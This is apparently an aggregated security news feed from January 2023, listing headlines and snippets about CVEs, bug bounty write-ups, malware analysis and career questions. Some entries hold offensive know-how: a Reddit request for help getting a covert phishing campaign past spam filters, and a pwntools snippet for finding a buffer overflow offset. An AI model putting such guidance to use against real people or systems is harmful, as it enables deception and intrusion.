    Researchers S2W used Jackalope fuzzer to exploit CVE-2022–24548 in Windows Defender and bypass its security controls. Continue reading on Medium »
  • Open

    Windows Backup Service 本地提权漏洞(CVE-2023-21752)分析
    作者:zoemurmure 原文链接:https://www.zoemurmure.top/posts/cve_2023_21752_1/ 0. 前言 CVE-2023-21752 是 2023 年开年微软第一个有 exploit 的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,因此在本文中花费了更多的篇幅介绍了这两部分内容,欢迎指...
  • Open

    Windows Backup Service 本地提权漏洞(CVE-2023-21752)分析
    作者:zoemurmure 原文链接:https://www.zoemurmure.top/posts/cve_2023_21752_1/ 0. 前言 CVE-2023-21752 是 2023 年开年微软第一个有 exploit 的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,因此在本文中花费了更多的篇幅介绍了这两部分内容,欢迎指...
  • Open

    달빗(Dalbit,m00nlight): 중국 해커 그룹의 APT 공격 캠페인 - ASEC BLOG
    submitted by /u/dmchell [link] [comments]
    Phishing Tips?
    Hey all, I have an upcoming physical/phishing engagement. Unfortunately I was tasked very short notice to develop a phishing campaign with custom domains. My boss is VERY adamant that this remains hush-hush so no whitelisting. (We are a PE firm testing some portfolios companies.) So far I have the domains bought, SPF, DKIM, and DMARC have been configured. I’ve tested my email configuration against mail tester and it’s 10/10. I have tried various combinations of O365 and SMTP APIs but everything I have tried ends up hitting the spam filter. Do you all have any recommendations on how to build IP/Domain reputation fast? Have any of you had success with an inbox warmer? I realize that this might not be possible on such short notice (<2 weeks away). I appreciate any tips/feedback. submitted by /u/KungFuBatman [link] [comments]
  • Open

    Self-XSS due to image URL can be eploited via XSSJacking techniques in review email
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1397940 - Bounty: $500
    HTML INJECTION (STORED)
    Judge.me disclosed a bug submitted by criptex: https://hackerone.com/reports/1252155
    Improper Access Control in Ali Express Importer
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1609955 - Bounty: $500
    Stored XSS in Public Profile Reviews
    Judge.me disclosed a bug submitted by vj1naruto: https://hackerone.com/reports/1398285 - Bounty: $250

  • Open

    An IDOR vulnerability often hides many others
    Some errors are occasional, others result from poor design, in this case, finding a vulnerability allows you to find many others… Continue reading on InfoSec Write-ups »
    A bug that permitted bypassing of Facebook’s two-factor authentication (2FA) was discovered by a…
    A flaw in a new, centralized system that Meta developed for users to manage their Facebook and Instagram logins could have made it… Continue reading on Medium »
    My First Hall Of Fame with Web Cache Poisoning
    Web Cache Poisoning — An Introduction | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Broken Function Level Authorization leads to disclosing PII Information of all company users
    بسم الله الرحمن الرحيم Continue reading on Medium »
    Hacking Blind
    Sometimes, an attacker sends payloads to hack a system but nothing is returned by the application, which can confirm that the application… Continue reading on Medium »
    Tokopedia HTML Injection
    Halo teman teman perkenalkan nama saya Mohammad Alfin Hidayatullah, Saya ingin membagikan write up tentang bug yang saya temukan di… Continue reading on Medium »
    Arbitrary file read tricks with headless browsers
    How to tackle some obstacles when hacking headless browsers to maximize the value of arbitrary file read vulnerabilities. Continue reading on Medium »
    Vulnerability Assessment vs Penetration Testing vs Red Team
    Cyber security is becoming increasingly important as the number of cyber attacks continues to rise. To stay ahead of the threat… Continue reading on Medium »
    Authentication bypass via encryption oracle
    This is practice lab presented by portswigger web security team. So this is under flow control vulnerability present in web application. Continue reading on Medium »
    Discovering Domains Like Never Before : Moniorg
    Introduction Continue reading on Medium »
  • Open

    Setting you up for failure: Exploring 2FA bypasses in web application settings page functionality
    I discuss an interesting attack vector which not many people do to possibly bypass 2 factor authentication in a web application. submitted by /u/TheCrazyAcademic [link] [comments]
    TimeException: A tool to find folders excluded from AV real-time scanning using a time oracle
    submitted by /u/sanitybit [link] [comments]
    Remote Command Execution in binwalk
    submitted by /u/Gallus [link] [comments]
    Learning CodeQL - Going Beyond Grep
    submitted by /u/Gallus [link] [comments]
    Github reports unauthorized access to some Github Desktop and Atom repositories
    submitted by /u/qwerty0x41 [link] [comments]
    The Good, Bad and Compromisable Aspects of Linux eBPF
    submitted by /u/eberkut [link] [comments]
    VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive and Exploit POC
    submitted by /u/scopedsecurity [link] [comments]
    Exposing Secrets Via AppSec Tools: The SonarQube Case
    submitted by /u/roy_6472 [link] [comments]
    How to identify and avoid malicious code in your software supply chain
    submitted by /u/n0llbyte [link] [comments]
    Lockpicking The Lockout Policy For Information Correlation: Exploring the novel web app attack…
    Discussing a under rated sub bug class of Buisness Logic Flaws in web apps that deserves more attention. submitted by /u/TheCrazyAcademic [link] [comments]
    CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
    submitted by /u/ustayready [link] [comments]
  • Open

    Lots of books in Romanian, French, German, English and Italian, from 1829 to 1945
    submitted by /u/Thocomerius [link] [comments]
    Music from some Amiga games
    http://amigamuseum.emu-france.info/Fichiers/mp3/ http://worldofmenchi.fr/Amiga/Musics/ https://www.amigahellas.gr/downloads/music/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    RedTeams (Explotación)
    La fase de explotación en un Red Team es la fase en la que se aprovechan las vulnerabilidades identificadas en la fase de reconocimiento… Continue reading on Medium »
    The Penetration Testing, Red Teaming, Vulnerability Assessments Debate: Which one is right for your…
    As businesses become increasingly reliant on technology, the need for robust security measures has become more important than ever. With… Continue reading on Medium »
    Vulnerability Assessment vs Penetration Testing vs Red Team
    Cyber security is becoming increasingly important as the number of cyber attacks continues to rise. To stay ahead of the threat… Continue reading on Medium »
    Discovering Domains Like Never Before : Moniorg
    Introduction Continue reading on Medium »
  • Open

    Stored XSS in SVG file as data: url
    Shopify disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/1276742 - Bounty: $5300
  • Open

    Any Application Security Engineer certs recommendation?
    I'm currently in the role of an Application Security Engineer in a Brazilian company, and my knowledge is becoming stagnant due to a lack of challenging tasks (which I hate). Do you guys have any certification recommendations that could be a challenge and also help boost my career/job profile? I've got a background in pen-testing and offensive security in general but have lost some interest in it as I don't really like the job opportunities associated. I've read a lot on OSCP and other Offensive Security certifications, but they all seem very offensive, whereas I'd like to focus more on the defensive side. (Vulnerability Management, how to implement SAST/DAST, when should a bug-bounty program be introduced? how would you rank the company's security maturity? Something along those lines) submitted by /u/Krlier [link] [comments]
    Hit me with your best recs relating to Security Architecture
    What communities are you a part of? Subreddits, associations, or other organizations to collaborate. submitted by /u/PussyFriedNachos [link] [comments]
    Paying for GREM out of pocket?
    Hi all, Hoping to get some advice. I would like to switch positions and work in a malware analyst or reverse-engineering role and was wondering if getting the GREM certification would be helpful in landing a job. I previously worked as a security consultant, red team member, tech writer, and, most currently, as product owner for an identity provider startup. I've come to dread working as a manager and get stressed and depressed every time I see myself being added to another meeting so I think some kind of change is necessary. Most of my technical work experience has been security-focused, though not on malware. More using tools such as burp suite, cobalt strike, nessus, IBM app scan, and other VA/pentesting tools. And writing reports. Lots of reports. I have some personal RE experience - I used to be active on some forums and progressed to recovering the RC4 keys of zeus variants and things like that, though my skills might be a bit rusty. I know enough x86/ia64 assembly to not be totally lost when using binary ninja, ghidra, or ida. I don't know if malware analyst/RE positions have hiring challenges similar to other netsec positions and I am not 100% sure what to expect. This leads me to ask - is getting the GREM cert worthwhile for landing a job? I would be paying for it out of pocket. I haven't decided whether or not I'd pay for the course or just try and pass the cert on my own. I don't have much experience with malicious macros, but I have dabbled in VBA a bit in the past. I do not have a college degree and cannot see myself finishing one at this point. I burned through 10 years of my GI Bill switching majors instead of just finishing something. So far the lack of degree hasn't hurt me too much. ​ Sorry for the long post - but if anyone has any insight, or can share their personal experience with a similar situation it would greatly appreciated. ​ Thanks! submitted by /u/tohitsugu [link] [comments]
    Using non-ssd drives to securely delete data
    Due to non definitive way to safely delete/purge a file from ssd, I was thinking to replace the disk with a traditional mechanical one and use shredding software to securely delete data using well known overwriting algorithms. Do you think it is a good approach? Thanks submitted by /u/AnotherRedditUsr [link] [comments]
    What even are ports ?
    Is it a piece of codes, a program, if it is , who wrote that, i just want to know more deep in its behind the hood, but the sources i found either generalize it too much or dive so deep i dont see it yet. For example say port 80 and port 443, how the computer even begin to open it , who wrote it, where is it locate in memory, can you even change modify it . I know it super basics and stupid question. Thanks in advance submitted by /u/tramquangpho [link] [comments]
  • Open

    SecWiki News 2023-01-31 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-31 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Autopsy max number of file events Timeline
    How can I output within Autopsy via Timeline tab on which date the max. number of File events happened? Thanks. submitted by /u/Failnaught223 [link] [comments]
  • Open

    Machine Learning Versus Memory Resident Evil
    Malware detection accuracy through memory detection and other tools highlights how to counter increasingly evasive malware types. The post Machine Learning Versus Memory Resident Evil appeared first on Unit 42.
  • Open

    New Attacks, Old Tricks: How OneNote Malware is Evolving
    1    Analysis of OneNote Malware A lot of information has been circulating regarding the distribution of malware through OneNote, so I thought it would be fun to look at a sample. It turns out there are a lot of similarities between embedding malicious code into a OneNote document and the old macro/VBA techniques for Office... The post New Attacks, Old Tricks: How OneNote Malware is Evolving appeared first on TrustedSec.
  • Open

    FreeBuf早报 | GitHub代码签名证书被盗;亲俄组织Killnet攻击美国医疗机构网站
    GitHub 披露,未知入侵者未经授权访问了其部分代码库,窃取了其桌面应用 Desktop 和 Atom 的代码签名证书。
    《2022年度区块链安全及反洗钱分析》发布,漏洞利用是最常见攻击方法
    2022 年安全事件共 303件,损失高达37.77 亿美元。相比 2021 年的 97.95 亿美元下降约 61%。
    安全防护之路——Suricata部署与测试
    Suricata是一种网络流量识别工具,它使用社区创建的和用户定义的signatures签名集(规则)来检查和处理网络流量。
    重磅!JD Sports泄露1000万用户信息
    JD Sports 近日披露了一次涉及 1000 万客户数据的网络攻击,这些客户的个人和财务信息可能已被攻击者访问。
    某黑客论坛上共享了美国”禁飞名单“
    名单上有超过 150 万名被禁飞者和超过 25 万名“被选中者”的记录。
    为黑客打工能挣多少?月薪最高达2万美元
    卡巴斯基针对20多万条发布在暗网的招聘启事,分析目前网络犯罪行业的整体薪资待遇。
    投入不低于7%!中证协发布网安三年提升计划
    《三年提升计划》共计5章20条,提出33项重点工作,以及六个方面的方向和要求。
  • Open

    OSINT Maltego
    Maltego is a very useful OSINT tool. Continue reading on Medium »
  • Open

    iptables 在 Android 抓包中的妙用
    作者: evilpan 原文链接: https://evilpan.com/2023/01/30/android-iptables/ 本文介绍一种在 Andorid 中实现单应用、全局、优雅的抓包方法。 此文于去年端午节编写,由于种种原因,当时藏拙并未发布。现删除一些敏感信息后分享出来,希望对各位有所启发。 背景 昨天在测试一个 Android APK 的时候发现使用 WiFi 的 HT...
    从零开始的 Boa 框架 Fuzz
    作者:崎山松形 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 最近在搞Iot的时候接触到Qiling框架,用了一段时间后感觉确实模拟功能挺强大的,还支持Fuzz,于是开始学习对Iot webserver这样的程序进行Fuzz。 官方给出了类似的例子如Tenda AC15 的httpd的fuzz脚本,但是也...
  • Open

    iptables 在 Android 抓包中的妙用
    作者: evilpan 原文链接: https://evilpan.com/2023/01/30/android-iptables/ 本文介绍一种在 Andorid 中实现单应用、全局、优雅的抓包方法。 此文于去年端午节编写,由于种种原因,当时藏拙并未发布。现删除一些敏感信息后分享出来,希望对各位有所启发。 背景 昨天在测试一个 Android APK 的时候发现使用 WiFi 的 HT...
    从零开始的 Boa 框架 Fuzz
    作者:崎山松形 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 最近在搞Iot的时候接触到Qiling框架,用了一段时间后感觉确实模拟功能挺强大的,还支持Fuzz,于是开始学习对Iot webserver这样的程序进行Fuzz。 官方给出了类似的例子如Tenda AC15 的httpd的fuzz脚本,但是也...
  • Open

    Electrify America bug opens hacking vulnerability concerns
    Article URL: https://www.teslarati.com/electrify-america-chargers-hacking-vulnerability-bug/ Comments URL: https://news.ycombinator.com/item?id=34590230 Points: 2 # Comments: 0
  • Open

    Soft Skills: Writing
    Writing.  Like math in middle school, this is one of those subjects that we pushed back on, telling ourselves, "I'll never have to use this...", and then quite shockingly finding that it's amazing how much writing we actually do. However, are we doing it well, given the particular circumstances of the writing? We "write" on social media, not being too overly concerned about things like grammar, spelling, or even word choice, falling back on the old, "...you know what I meant...", or blaming auto-correct for the miscommunication. I'll be the first to admit, I'm not an "expert" at writing, nor am I "the best". But I will say that I am intentional in my writing, and this is something that's led me to...not been the result of...maintaining a blog, and publishing several books, with others in …
  • Open

    Question regarding GDB/GEF and pwntools to find buffer overflow
    I am trying to identify the offset in which a buffer overflow occurs via pwntools and gdb via submission of integers and scanf. Here is the C code (x64): int input[8]; int count, num; count = 0; while(1) { printf("Enter:\n"); scanf("%d", &num); if (num == -1){ break; } else { input[count++] = num; } } Understanding that the size of the integer is 4 bytes, I am attempting to feed the program a string of integers via pwntools (code below): from pwn import * context.log_level = "debug" io = gdb.debug('_file_') for i in range(0,10,1): io.clean() io.sendline("{:d}".format(i)) io.interactive() However, I am having trouble finding the offset and trying to debug the program via gdb. I would like to be able to see changes to the stack as each integer is input (via ni or si). Is there a better way to identify where the program crashes? I am using the for loop as a proxy for pattern create (with the hope to see which integer causes the crash). Any insights would greatly be appreciated! submitted by /u/tbenson80 [link] [comments]

  • Open

    KeePass disputes vulnerability allowing stealthy password theft
    Article URL: https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/ Comments URL: https://news.ycombinator.com/item?id=34587387 Points: 17 # Comments: 1
  • Open

    I need advice on choosing what's best for my career
    First off, I just want to say that I'm very blessed to be in the current position that I'm in now. I realize that the market is tough right now and that I'm very fortunate to be having the opportunities that I have right now especially as I am leaving college. I hope that my post doesn't come off in any way as bragging/ungrateful or anything like that. I just simply want more opinions on what I should do. So I have two Internship offers for my final summer in University. The first one is for Crowdstrike and it is as an analyst for their Falcon Complete product. The second one is for IBM and it is for their penetration testing team. In terms of my career I really would like to go down the red team route, but I fear that I may be missing out on a big opportunity by not working with Crowdstrike. It seems like a lot of people have positive things to say about them and they are a pretty big name in the industry. I think I remember one redditor saying that they would work for them for free if they had the chance or something. But I have a slight/moderate dissatisfaction towards the role, I did forensics at another internship last summer and I can't really see myself doing that for years. It's a cool field, but I just don't think its for me. There is also the prospect of lay offs. Apparently there is supposed to be more layoffs around the time I'm supposed to start, so I fear that my offer may be pulled from one or the other. A couple of people in my life, have told me to accept both offers, but then just renege one of them like a week before the start dates, but doing this will for sure burn bridges and I believe that is pretty unwise especially this early in my career. Any advice on how I should approach this situation? submitted by /u/No_Actuator_6713 [link] [comments]
    Groomed for a Firewall position
    Hey all, I'm looking to see if there is anywhere I can get my hands dirty on Cisco or Palo Alto firewalls. My experience on these are limited but I am being nudged by a colleague for a possible job opening in lieu of these requirements. If anyone can point me in the right direction that would be phenomenal. I currently work in cyber but as an ISSO and I need something more technical before i bash my head against my monitor. If i have to buy hardware off of ebay, i will ASAP. submitted by /u/zeropyther [link] [comments]
    Hak5 / charging cable question
    Hi guys! I am a newbie and came across a technology, usb ports and charging cables from hak5. Apparently you stick them into phones to charge and they look like regular usbc cables from Apple or usb sticks into computer ports and they do things like key logging and whatever. The site says they do things like keystroke injection (duckyscript), mouse injection, payload slots, self destruct, geofencing, Wi-Fi trigger, full speed usb hardware keylogger, convert data exfil, and networked c2. Idk what any of this means I’m just transcribing. Anyway, does this mean like if you plug one of these into your iPhone or computer they download viruses and keyloggers forever and your device has it like herpes or is it only when it’s plugged in it can read and see what’s going on and why hasn’t Apple done anything about this? Same question applies to usb drives. And how can I counteract this? I heard you can disable the usb drive on your computer at least so it. Just doesn’t recognize the usb. Thanks! submitted by /u/Normal-Question-1994 [link] [comments]
    It's safe to open sdh port with password?
    Hi, I'm using manjaro on a little server and I would like to use ssh/sftp out of my lan. To archive this I open ssh port, redirecting it to a non standard port on router, and set up a keepass generated hard password. Is this secure enought? Thanks! submitted by /u/RuedaRueda [link] [comments]
    Training materials for understanding infra? (containers, Kubernetes, Docker)
    Hey guys, I'm currently a jr app sec engineer mainly helping in secure code development and running SAST/DAST tools. I'm currently studying for AWS Security cert, but my understanding of infra is very weak. Does anyone know where they can point me in the right direction here? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    Lots of wares
    submitted by /u/ra6907 [link] [comments]
    Lots of (A-Do-Be) zip / exe Southeast Uni
    submitted by /u/ra6907 [link] [comments]
    Prison Complaints/Reports
    submitted by /u/bluejazzberries [link] [comments]
    Open ftp 142.116.175.23
    Wallpapers, videos submitted by /u/cheesyvagina6 [link] [comments]
  • Open

    Account Takeover (Insecure Design+ Response manipulation)
    Hey Everyone! Let’s learn something new as it is going to fun learning today. Continue reading on Medium »
    SSRF — Server Side Request Forgery
    Simple Brief Explanation of SSRF Continue reading on Medium »
    ‘PTN’ infosec monthly #9 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    All About SSRF (“Server-Side Request Forgery”)
    Are you curious how to find SSRF vulnerabilities yourself? If so, lets take a look at what SSRF really is and go over many details of SSRF… Continue reading on Medium »
    How i hacked all Zendesk sites 265,000 site by one line
    Hi Everyone! Continue reading on Medium »
    Your First Day As A Bug Bounty Hunter On Immunefi
    Who We Are Continue reading on Immunefi »
    Mastering Reconnaissance in Bug Hunting
    TL;DR- Bug hunting is a challenging task, but it can be simplified with the right tools and tactics. Continue reading on The Gray Area »
    How I bypassed the registration validation and logged-in with the company email
    Hello everyone, I hope all is okay with you. Continue reading on Medium »
    Deep dive into Built-in Webserver overwrite of $_SERVER[‘request_uri’]
    While reviewing the recent PHP Development Server <= 7.4.21 Remote Source Disclosure Vulnerability on… Continue reading on Bugrid »
    Access control vulnerabilities and privilege escalation (Lab: Method-based access control can be…
    Hello everyone I’m Ahmed a new learner of bug bounty known as THE ATC TH3_4TC I’m so happy share with you my first write-up of portswigger… Continue reading on Medium »
  • Open

    Magnet Axiom: Bringing in a new hash set post processing - possible?
    Braintrust, I am still waiting on a response from tech support, but is it possible to bring a new hash set into Axiom after processing? I don't see anything in the manual regarding this and I haven't yet played with their new remote Hash Manager (boxes are offline). Thanks. submitted by /u/Sir_Agent_Apple [link] [comments]
  • Open

    Unlocking the Power of OSINT
    Unlock the power of open-source intelligence to uncover hidden truths and gain valuable insights. Continue reading on Medium »
    The Art of Tracking a Hacker || Data Breaches
    In the world of cybersecurity, it’s pretty common when companies or individuals get affected because of cyber attacks or Data Breaches. Continue reading on System Weakness »
    Do You Find Someone OR Something?
    I will be your OSINT investigator, monitoring on your any target Continue reading on Medium »
  • Open

    The Importance of Red Team and Blue Team in an Enterprise
    Red teams and Blue teams are essential security components for enterprises. Read about the red team’s and blue team's skills and… Continue reading on Medium »
    Red Team Operations in Cyber Security
    Using an adversarial approach, red teaming is a technique for rigorously assessing plans, rules, systems, and premises. A red team may be… Continue reading on Medium »
  • Open

    Truffle Security is proud to host a new XSSHunter, that finds new vulnerabilities
    submitted by /u/wifihack [link] [comments]
    DDoS attacks in Europe experienced a 73% increase in 2022 compared to the previous year
    submitted by /u/shapelez [link] [comments]
    Metasploit Framework 6.3 Released
    submitted by /u/Fugitif [link] [comments]
    FIM (File Integrity Monitor) proof-of-concept implementation
    submitted by /u/CsaProtocol [link] [comments]
    Public Disclosure for CVE-2022-42475
    submitted by /u/BlackCatNeo [link] [comments]
  • Open

    SecWiki News 2023-01-30 Review
    Nacos accessToken 权限认证绕过漏洞及思考 by 君行路 SecWiki周刊(第465期) by ourren 大论文写作小技巧 by ourren php://filter过滤器利用之代码执行漏洞 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-30 Review
    Nacos accessToken 权限认证绕过漏洞及思考 by 君行路 SecWiki周刊(第465期) by ourren 大论文写作小技巧 by ourren php://filter过滤器利用之代码执行漏洞 by ourren 更多最新文章,请访问SecWiki
  • Open

    XSS in uploader
    Hello ;) Continue reading on Medium »
    How I am able to find XSS on Boat Chat Bot
    Hi there! My name is Malav Khatri, and I’m a Security Researcher. I’m going to share how I am able to get XSS in the chatbot on the… Continue reading on Medium »
  • Open

    FreeBuf早报 | 乌克兰将俄网攻行为定性为战争罪;Zendesk员工被黑致用户个人信息外泄
    乌克兰官员正在创造历史,甚至可能重塑网络战的未来。
    甲方纵深防御体系范畴和落地实践
    纵深防御模型经常会被甲方、乙方拿来讨论和分析,也是甲方企业安全建设中最重要的参考模型,在实际的攻防对抗中起到非常高的价值。
    狂揽1亿美元,被FBI渗透长达六个月,2022年最暴利的组织凉了
    美国司法部和欧洲刑警组织共同宣布,经过长达6个月的渗透,臭名昭著的Hive 勒索软件组织被FBI和国际刑警破获。
    FB 赠书第 94 期 | 网安行业 2023 年弯道超车需要看哪些书,都在这里了
    文中例举了 2022 年网安行业最受欢迎的 10 本书,欢迎大家在评论区填写个人最想要的一本,并说出理由。
    下载量超2000万次,这些网络钓鱼app赶快卸载
    一种新的活动跟踪应用程序在 Android 的官方应用程序商店 Google Play 上取得了巨大收获,其下载量已经超过2000万次。
    因漏洞频发,微软敦促客户保护本地Exchange服务器
    近年来, Exchange Server 已被证明是一种十分有利可图的攻击媒介,其中的许多安全漏洞曾被用做零日攻击。
    Microsoft 365 全球宕机5小时,竟是路由器的锅
    长达五个小时的微软 365全球中断是路由器IP地址变化导致其广域网中所有其它路由器之间数据包转发问题引起。
  • Open

    Firefox 在野 0day 分析
    作者:维一零 原文链接:https://weiyiling.cn/one/firefox_0day_case_analysis RCE部分 在渲染进程通过一个JS脚本利用XSL对象解析的UAF漏洞执行远程ShellCode。 漏洞原理 利用程序首先定义一些XML,内部包含多个XSL对象。 随后调用transformToDocument方法导致Convert函数被调用。 Convert函数...
    基于代码属性图的自动化漏洞挖掘实践
    作者:wh1t3Pig 原文链接:《基于代码属性图的自动化漏洞挖掘实践》 0 前言 应用程序分析技术挖掘应用漏洞一直以来都是学术界和工业界的研究重点之一。从最初的正则匹配到最近的代码属性图挖掘方案,国内外有很多来自不同阶段的安全工具或商业产品来发掘程序代码的安全问题。在 Java 语言方面,业界已经有了不少出色的产品,如 CodeQL 等,但是,多数产品考虑的角度是从甲方视角或开源视角出发的...
  • Open

    Firefox 在野 0day 分析
    作者:维一零 原文链接:https://weiyiling.cn/one/firefox_0day_case_analysis RCE部分 在渲染进程通过一个JS脚本利用XSL对象解析的UAF漏洞执行远程ShellCode。 漏洞原理 利用程序首先定义一些XML,内部包含多个XSL对象。 随后调用transformToDocument方法导致Convert函数被调用。 Convert函数...
    基于代码属性图的自动化漏洞挖掘实践
    作者:wh1t3Pig 原文链接:《基于代码属性图的自动化漏洞挖掘实践》 0 前言 应用程序分析技术挖掘应用漏洞一直以来都是学术界和工业界的研究重点之一。从最初的正则匹配到最近的代码属性图挖掘方案,国内外有很多来自不同阶段的安全工具或商业产品来发掘程序代码的安全问题。在 Java 语言方面,业界已经有了不少出色的产品,如 CodeQL 等,但是,多数产品考虑的角度是从甲方视角或开源视角出发的...

  • Open

    Malware development part 6 - advanced obfuscation with LLVM and template metaprogramming
    submitted by /u/dmchell [link] [comments]
  • Open

    Geolocating Terrorists With ChatGPT
    TOPICS Continue reading on The Sleuth Sheet »
    15 ressources pour découvrir l’osint
    On parle de plus en plus de l’investigation numérique et ses multiples méthodes. Voici quelques ressources pour découvrir cette discipline. Continue reading on Medium »
    Mistakes of administrators of Telegram channels
    If you only knew how many mistakes the administrators of political Telegram channels make… One of the most popular mistakes is leaving the… Continue reading on Medium »
    ChatGPT: AI is coming…
    Neural network technologies included in ChatGPT (https://openai.com/blog/chatgpt/) are beginning to be used everywhere. The simplest and… Continue reading on Medium »
    SPY NEWS: 2023 — Week 4
    Summary of the espionage-related news stories for the Week 4 (January 22–28) of 2023. Continue reading on Medium »
    “Navigating the World of OSINT: A Beginner’s Guide”
    Open Source Intelligence (OSINT) collects, analyzes, and disseminates publicly available and legally obtained information. The goal of… Continue reading on Medium »
    Need online investigation, background someone or something? Look no further!
    As a professional online private investigator, I have the skills and expertise to gather the information based on your need, to make… Continue reading on Medium »
    Want to find somone in the online world, or do you want to check someones background?
    As an OSINT (Open-Source Intelligence) service provider, I am excited to offer my expertise and tools to individuals and businesses… Continue reading on Medium »
    Israeli Operations Internal to Iran
    Same tactics, different enemy, another day…. Continue reading on Medium »
    Infoga E-Mail Bilgi Toplama Aracı
    Kullanımı çok basit olması ile birlikte sızma testinde bilgi toplama aşamasında işimize yarayabilecek bir araç. Bilgileri Google, Shodan… Continue reading on Medium »
  • Open

    How To Become A Hacker In 2023 | From Zero to Hero
    In this video, we will explore the skills and knowledge needed to become a hacker. From understanding different types of hackers and their… Continue reading on Medium »
    How I was able to find 4 Cross-site scripting (XSS)on vulnerability disclosure program ?
    Hello I’m Amr Mustafa AKA DrakenKun Continue reading on Medium »
    A not so common bug but easy to look for
    Hello everyone, today I’m going to talk about a bug I have found only once and other hackers told me it’s kinda rare, but It’s so simple… Continue reading on Medium »
    Blind XSS To SSRF
    During bug hunting in a private bug bounty program, I came across a feature within the application that allowed for the generation of PDF… Continue reading on Medium »
    SQL Injection Vulnerability -Web Application Penetration Testing
    What is SQL Injection Continue reading on Medium »
    Discovered a Critical IDOR and Earned $900 for My First P1 Vulnerability!
    Hello Guys, It is been a very long time since I wrote a bug bounty write-up. Without any delay let’s get into it. Continue reading on Medium »
    Open Redirect Bug Bounty
    What is an open Redirect? Continue reading on Medium »
    Directory Traversal -Web Application Penetration Testing
    What Is Directory Traversal? Continue reading on Medium »
    All About Attacking JWT
    JWT: The Weak Link in Your Security Chain? Understanding and Addressing JWT-related Threats Continue reading on InfoSec Write-ups »
  • Open

    Hackers Using Microsoft OneNote Attachments To Spread Malware
    submitted by /u/achilles4828 [link] [comments]
    /r/netsec's Q1 2023 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    PHP Development Server <= 7.4.21 - Remote Source Disclosure
    submitted by /u/Gallus [link] [comments]
  • Open

    Ftkimager CLI logical image without unallocated space
    Is there a way to generate a logical image of a drive with ftkimager command line interface without the unallocated space? I’m currently testing with generating E01s by using the drive’s logical path as a source, but by default, it includes the unallocated space, and it doesn’t accept folder paths, or doesn’t seem to have any attributes to exclude unallocated space. So it seems like I’m just creating a physical E01 image of a partition. Am I missing something or is it just not possible? submitted by /u/RESP-svee-T [link] [comments]
    Looking to get started
    Hello everyone, I recently graduated from college and I am looking to get started in my career within computer forensics, I have done some research such as taking certs. Is there other ways I can start since money is sorta tight at the moment. Any and all advice would be helpful. submitted by /u/Plane-Quantity-651 [link] [comments]
    SANS FOR500 roadmap (seeking advice)
    Hello everyone I have little of experience in cyber security (6 month of working in SOC). I am making a plan on how to prepare myself for FOR500 exam. I have almost finished Practical Windows Forensics by TCM-Security which is awesome and watched 13Cubed youtube channel. I am just asking for any free or non-expensive courses to build a strong foundation submitted by /u/stas-citrus [link] [comments]
  • Open

    Open Redirect at blueonboardingqa1.jetblue.com
    JetBlue disclosed a bug submitted by mmdz: https://hackerone.com/reports/1457736
    Rails ActionView sanitize helper bypass leading to XSS using SVG tag.
    Internet Bug Bounty disclosed a bug submitted by haqpl: https://hackerone.com/reports/1805873 - Bounty: $2400
  • Open

    SecWiki News 2023-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-29 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Unauthenticated RCE in Centos Control Web Panel 7 (CWP) – CVE-2022–44877
    Article URL: https://www.vicarius.io/vsociety/blog/unauthenticated-rce-in-centos-web-panel-7-cwp-cve-2022-44877 Comments URL: https://news.ycombinator.com/item?id=34567059 Points: 1 # Comments: 1
  • Open

    FreeBuf早报 | 受害者不支付赎金,黑客收入下降;俄罗斯外交部:美国正在入侵网络空间
    今日俄罗斯电视台网站报道,乌克兰总统泽连斯基25日意外出现在俄罗斯电视频道上。
    世界经济论坛:2023年全球网络安全展望
    世界经济论坛联合埃森哲共同发布了《2023年全球网络安全展望》报告,预测未来一年影响全球经济和社会的网络安全趋势。
    俄IT巨头源代码被一锅端,公司否认黑客入侵
    俄罗斯最大的IT科技公司之一Yandex的源代码仓库据传遭到前员工窃取
  • Open

    Cheat Sheet for Ffuf
    Here is a quick cheat sheet for Web application pen testing with FFuF: Continue reading on Medium »
  • Open

    Cheat Sheet for Ffuf
    Here is a quick cheat sheet for Web application pen testing with FFuF: Continue reading on Medium »

  • Open

    JS Enumeration Tools for Bug Bounty Hunting: Identifying Vulnerabilities and Gaining Website…
    JS Enumeration is a crucial step in the process of identifying and exploiting vulnerabilities in a website. As a bug bounty hunter, you… Continue reading on Medium »
    Bypass CSRF protection with XSS.
    Do not send an xss report before reading this Continue reading on Medium »
